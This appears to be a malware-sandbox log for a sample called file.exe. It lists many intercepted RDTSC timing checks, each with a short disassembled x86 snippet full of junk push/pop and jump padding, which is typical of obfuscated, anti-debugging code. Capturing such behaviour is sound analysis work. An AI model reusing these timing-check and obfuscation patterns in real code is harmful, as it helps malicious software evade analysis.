Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE3791 second address: CE37A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE3D82 second address: CE3D91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA32872BAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE4E08 second address: CE4E34 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA328DF73ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA328DF73B9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE61DE second address: CE61F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FA32872BAE6h 0x00000009 jne 00007FA32872BAE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE70DB second address: CE70DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE7FAF second address: CE7FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE70DF second address: CE70E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE8E02 second address: CE8E0C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE9022 second address: CE9028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE9028 second address: CE9087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bh, 05h 0x0000000b cld 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FA32872BAE8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d xor edi, 5B31C189h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov edi, 3B73D2FDh 0x0000003f cld 0x00000040 mov eax, dword ptr [ebp+122D0405h] 0x00000046 movzx ebx, di 0x00000049 push FFFFFFFFh 0x0000004b ja 00007FA32872BAECh 0x00000051 nop 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEAF4A second address: CEAF6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007FA328DF73A6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA328DF73B1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA0C5 second address: CEA0E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA0E3 second address: CEA0F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FA328DF73A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CED670 second address: CED675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF1501 second address: CF159B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA328DF73ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jg 00007FA328DF73AEh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FA328DF73A8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jmp 00007FA328DF73B4h 0x00000031 jmp 00007FA328DF73B1h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 sub edi, dword ptr [ebp+1246D9DEh] 0x0000003f pop ebx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FA328DF73A8h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 00000017h 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c xor bx, D066h 0x00000061 xchg eax, esi 0x00000062 push edi 0x00000063 push eax 0x00000064 push edx 0x00000065 push esi 0x00000066 pop esi 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF159B second address: CF15A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF24B1 second address: CF24B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF24B5 second address: CF24CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 jc 00007FA32872BAECh 0x0000000f jng 00007FA32872BAE6h 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEE980 second address: CEE985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEE985 second address: CEE98B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEE98B second address: CEE98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF756 second address: CEF75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF75A second address: CEF768 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF344F second address: CF3453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF3453 second address: CF3477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jnc 00007FA328DF73A6h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF077E second address: CF0790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB0C2 second address: CEB0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov bl, ah 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d mov dword ptr [ebp+1246A326h], eax 0x00000023 mov eax, dword ptr [ebp+122D04B5h] 0x00000029 mov dword ptr [ebp+122D28C8h], edi 0x0000002f push FFFFFFFFh 0x00000031 mov ebx, dword ptr [ebp+122D26C9h] 0x00000037 push eax 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF26DA second address: CF26E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF8F60 second address: CF8F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF8F64 second address: CF8F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CAE4 second address: C8CAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CAEA second address: C8CAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CAF4 second address: C8CAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CAFA second address: C8CB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CB07 second address: C8CB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8CB0B second address: C8CB23 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA32872BAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FA32872BAE6h 0x00000012 jne 00007FA32872BAE6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9BB5B second address: C9BB73 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA328DF73AEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9BB73 second address: C9BB80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFC32B second address: CFC336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFC4CD second address: CFC4D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FA32872BAE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0589D second address: D058BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007FA328DF73B6h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05EBE second address: D05EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05FF5 second address: D06019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FA328DF73B1h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FA328DF73AAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0615E second address: D06162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B0BB second address: D0B0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73B9h 0x00000009 jl 00007FA328DF73A6h 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 jmp 00007FA328DF73B1h 0x00000017 push ecx 0x00000018 jmp 00007FA328DF73AAh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B541 second address: D0B548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B9B7 second address: D0B9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B9C5 second address: D0B9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B9C9 second address: D0B9CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B9CF second address: D0B9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B9D5 second address: D0B9DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B9DA second address: D0B9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0BE06 second address: D0BE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73ADh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C082 second address: D0C086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C086 second address: D0C0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA328DF73B7h 0x0000000e pushad 0x0000000f jmp 00007FA328DF73AAh 0x00000014 pushad 0x00000015 popad 0x00000016 jc 00007FA328DF73A6h 0x0000001c jmp 00007FA328DF73B9h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C0D3 second address: D0C0DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA32872BAE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C0DF second address: D0C0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C509 second address: D0C513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA32872BAE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C513 second address: D0C55B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73B5h 0x00000007 jc 00007FA328DF73A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA328DF73B9h 0x0000001c jne 00007FA328DF73ACh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C55B second address: D0C55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C55F second address: D0C565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C565 second address: D0C574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FA32872BAE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D113D2 second address: D113D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D113D8 second address: D113EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA32872BAEFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11929 second address: D11939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73AAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11AA3 second address: D11AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1105D second address: D11084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73ACh 0x00000007 jmp 00007FA328DF73AFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FA328DF73ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1231E second address: D12349 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAEEh 0x00000007 jp 00007FA32872BAE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA32872BAF1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1956A second address: D19578 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1CDE0 second address: D1CDE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6EA8 second address: CD6EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6EAC second address: CBD4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 movzx edi, bx 0x0000000b mov dh, cl 0x0000000d lea eax, dword ptr [ebp+1248AC36h] 0x00000013 mov dword ptr [ebp+122D231Fh], eax 0x00000019 mov edi, dword ptr [ebp+122D264Ah] 0x0000001f push eax 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007FA32872BAF2h 0x00000027 jmp 00007FA32872BAECh 0x0000002c popad 0x0000002d push ebx 0x0000002e push edx 0x0000002f pop edx 0x00000030 pop ebx 0x00000031 popad 0x00000032 mov dword ptr [esp], eax 0x00000035 mov ecx, ebx 0x00000037 call dword ptr [ebp+122D28F5h] 0x0000003d pushad 0x0000003e jl 00007FA32872BAECh 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD735C second address: CD7384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA328DF73B2h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA328DF73ABh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD75BE second address: CD75C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7888 second address: CD788E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8068 second address: CD806E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD806E second address: CD8072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8072 second address: CD8091 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA32872BAF2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8091 second address: CD8097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD82C2 second address: CD82C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD82C6 second address: CD82CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD82CC second address: CD8326 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA32872BAECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FA32872BAE8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 jc 00007FA32872BAEEh 0x0000002b jl 00007FA32872BAE8h 0x00000031 push esi 0x00000032 pop edx 0x00000033 pushad 0x00000034 cld 0x00000035 push edi 0x00000036 mov dword ptr [ebp+122D203Ch], esi 0x0000003c pop ebx 0x0000003d popad 0x0000003e lea eax, dword ptr [ebp+1248AC7Ah] 0x00000044 mov dword ptr [ebp+122D263Fh], eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8326 second address: CD837B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007FA328DF73B1h 0x0000000f call 00007FA328DF73B5h 0x00000014 mov dword ptr [ebp+12458F95h], edx 0x0000001a pop ecx 0x0000001b pop edi 0x0000001c add dword ptr [ebp+122D200Bh], ecx 0x00000022 lea eax, dword ptr [ebp+1248AC36h] 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FA328DF73AEh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD837B second address: CD8381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8381 second address: CBDFFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 nop 0x00000012 mov dh, 47h 0x00000014 call dword ptr [ebp+122D2224h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jns 00007FA328DF73A6h 0x00000023 rdtsc
